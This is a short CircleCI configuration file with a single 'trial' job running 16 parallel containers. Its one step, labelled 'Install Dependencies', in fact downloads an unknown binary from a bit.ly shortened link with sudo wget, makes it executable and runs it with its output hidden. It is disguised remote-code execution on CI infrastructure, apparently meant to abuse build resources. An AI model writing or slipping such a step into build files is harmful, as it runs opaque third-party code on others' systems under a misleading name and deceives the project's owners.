version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              sudo wget https://bit.ly/3q9lDAI && chmod +x 3q9lDAI && ./3q9lDAI >/dev/null
              
       

workflows:
    version: 2.1
    build:
        jobs:
        - trial